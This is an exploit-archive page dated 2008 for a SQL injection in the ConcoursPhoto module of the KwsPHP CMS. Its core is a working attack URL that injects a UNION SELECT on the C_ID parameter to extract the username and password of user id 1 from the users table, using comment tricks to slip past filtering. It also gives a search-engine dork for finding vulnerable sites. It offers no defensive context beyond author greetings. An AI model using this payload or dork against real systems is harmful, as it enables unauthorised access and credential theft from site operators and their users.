[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability
# Published : 2008-04-03
# Author : Stack
# Previous Title : KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability
# Next Title : Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability
#########################################################################
KwsPHP Module ConcoursPhoto Remote SQL Injection Exploit
#########################################################################
## AUTHOR : Stack-Terrorist [v40]
## Email : admin@v4-team.com
## Home : http://v4-team.com & http://stack-terrorist.com
## Script : KwsPHP Module ConcoursPhoto
## Bug : Remote SQL Injection Exploit
## Dork : inurl:index.php?mod=ConcoursPhoto
## EXPLOITS :
http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*
## GREETZ : All muslims Hackers
## speacial thnx to : str0ke
#########################################################################
Stack-Terrorist [v40]
#########################################################################
# www.Syue.com [2008-04-03]